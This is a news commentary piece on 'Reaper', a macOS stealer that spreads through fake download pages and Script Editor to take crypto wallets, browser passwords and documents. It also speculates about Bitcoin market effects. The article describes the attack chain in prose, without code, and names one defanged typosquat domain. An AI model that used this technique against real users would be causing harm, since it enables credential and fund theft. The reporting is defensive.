Reaper stealer slips past Terminal, macOS users lose crypto wallets
A new macOS malware strain called “Reaper” is dodging Apple’s recent security fixes and going after crypto wallets and browser extensions. Bad news. Not the routine kind, either. This is not a throwaway phishing page begging for a seed phrase. It is cleaner, quieter, and uglier: the sort of attack that can empty individual wallets first, then make retail traders second-guess every download button they touch. My take: this is exactly the kind of small-looking security story that users underestimate until the losses start clustering.
Reaper spreads through fake download pages for apps people already trust, including WeChat and Miro. Once it lands on a Mac, it hunts for crypto wallet data and saved browser passwords. The trick borrows from an older scam that pushed users to paste malicious commands into Terminal. Apple patched that route in a recent macOS update. Reaper just changed lanes. Instead of Terminal, it uses Script Editor, another Apple tool already sitting on the machine, to get to the same place. Most guides frame this as a “do not paste commands” problem. That’s only half right. The bigger issue is that attackers keep finding trusted macOS surfaces where the warning bells feel quieter.
The attack chain is nasty because it looks so ordinary. Fake download sites open Script Editor through an applescript:// URL. The malicious code is buried under ASCII art and blank space, so a regular person staring at the window probably sees nothing useful. Then the user clicks the “play” button in Script Editor and runs the commands. Why does this matter? Because Script Editor comes preinstalled on every Mac, and most people do not mentally file it next to malware risk. That is why this works. The first click often starts on typosquatted domains such as mlcrosoft[.]co[.]com, built to look close enough at a glance. After the script runs, a fake Apple security update prompt asks for the Mac password. I’ll be honest: that prompt is the part I hate most, because it feels boring and official. One odd detail: if the keyboard is set to Russian, the malware stops. Regional kill switches like that often show up when operators are trying to avoid local law enforcement.
Reaper mainly targets desktop crypto apps, including Ledger Live, Trezor Suite, and Exodus. It does more than steal credentials. It changes the wallets’ internal code so it can catch future transactions and redirect funds. That is the detail that would make me pause before opening any wallet app I recently installed or updated. People use hardware wallets because they expect a tougher target. Fair. But the desktop interface is still part of the trust chain, and Reaper attacks that layer directly. It also takes saved credentials from Chrome, Firefox, and Edge, then pulls data from extensions such as 1Password and MetaMask. It scans the Desktop and Documents folders for .docx, .pdf, .xlsx, .wallet, and .keys files, compresses them into 70MB ZIP chunks, and sends them to an external command and control server. To stay on the machine, it installs a backdoor disguised as a Google Software Update directory. Moonlock says Reaper is the third campaign in about two months to use this automated AppleScript approach. Microsoft’s Defender Security Research Team also wrote about related campaigns using fake macOS troubleshooting guides on Medium, Craft, and Squarespace, which Cryptopolitan previously covered. Those campaigns used a similar “ClickFix” method to deliver AMOS, Macsync, and SHub Stealer through Terminal commands. Some even replaced real wallet apps with malicious copies in the background.
For macOS crypto users, this is the sort of threat that makes the whole setup feel shakier. Bitcoin (BTC) has held up through plenty of geopolitical stress and traditional market selloffs, and BTC climbed to $61.4K in early March as institutional inflows and risk appetite picked up. Wallet theft feels different, though. It does not need to move the whole market to change behavior. If enough users lose funds through tools they thought were safe, some will stop using desktop wallets for a while. Others may move coins back to centralized exchanges, which brings a different stack of risks. On chain activity could soften. Selling pressure could rise at the edges. Is that overstatement? Maybe for one isolated campaign. But crypto depends heavily on users believing they can custody assets safely, and Reaper hits that nerve directly.
What this means
Reaper points to a simple, uncomfortable shift: attackers are not waiting around for old tricks to keep working. They are moving to quieter paths like Script Editor and betting that users will trust anything that looks vaguely like macOS. The damage is not limited to one stolen wallet. It chips away at confidence in personal custody, especially for people who rely on desktop apps and browser extensions. Counter to the usual advice, “just use a hardware wallet” is not a complete answer here. Changing the code inside Ledger Live or Trezor Suite is a serious escalation. Even if the hardware wallet itself is not broken, the software around it starts to feel less safe. Some money may move away from desktop wallet setups and toward mobile wallets or centralized exchanges. Wallet teams need to patch fast, explain what happened in plain language, and skip the usual vague security wording. Say what changed. Name the versions. Give users a clean path.
Investors should be stricter for a while. Check every download link before installing anything. If a random pop up asks for your Mac password, stop. Do not type it in just because the window looks official. Skip this step. A decent security tool may catch obfuscated scripts before they run, but common sense still matters here. If a website tells you to open Script Editor, close the tab. Watch for official notices from Ledger, Trezor, and Exodus about affected versions or recommended steps. Yes, this sounds like basic advice after a technical malware chain, but basic advice is where these attacks often win or fail. A rise in reported thefts could hit related tokens or make the wider market more cautious. BTC’s 200 day moving average is worth watching too. If price breaks below it while exploit reports keep rising, that would say something about market confidence. The next few weeks matter for wallet providers, but users have work to do as well.